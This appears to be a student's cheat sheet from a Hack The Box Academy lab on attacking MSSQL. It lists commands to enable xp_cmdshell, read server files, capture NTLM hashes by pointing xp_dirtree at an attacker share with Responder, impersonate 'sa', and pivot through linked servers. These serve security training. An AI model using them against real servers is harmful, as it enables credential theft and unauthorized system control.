MSSQL Commands

MSSQL default system schemas/databases:

• master - keeps the information for an instance of SQL Server.

• msdb - used by SQL Server Agent.

• model - a template database copied for each new database.

• resource - a read-only database that keeps system objects visible in every database on the server in sys schema.

• tempdb - keeps temporary objects for SQL queries.

# It will show the name of existing database/s
SELECT name FROM master.dbo.sysdatabases
GO

# It will use the htbusers database
USE htbusers
GO

# It will show the names of existing table/s
SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES
GO

SELECT * FROM table_name

# It will enable the xp_cmdshell
EXECUTE sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXECUTE sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO

# Then just run this
xp_cmdshell 'whoami'
GO

# This will read the /etc/hosts file
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
GO

# Reading a file from linked server/another server
EXECUTE('SELECT * FROM OPENROWSET(BULK N''C:/Users/Administrator/Desktop/flag.txt'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV]

# It will acccess the share 
EXEC master..xp_dirtree '\\10.10.110.17\share\'

# Attacker machine you will get the user hash 
sudo responder -I tun0

ORRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR

# Attacker machine you will get the user hash
sudo impacket-smbserver share ./ -smb2support

# This will display the name of users
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO

# Here is the full one line just pase it
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

# This will verify the role of current user
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go

# This will impersonate a SA user
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

# This will show the linked servers in mssql
SELECT srvname, isremote FROM sysservers

EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
GO

# As we can see in the query's output, we have the name of the server and the column isremote, where 1 means is a remote server, and 0 is a linked server.

# Then we can use this to see some data from column
SELECT abc.username FROM [LOCAL.TEST.LINKED.SRV].[TestAppDB].[dbo].[tb_users] abc

• hackthebox academy - attacking with common service (mssql)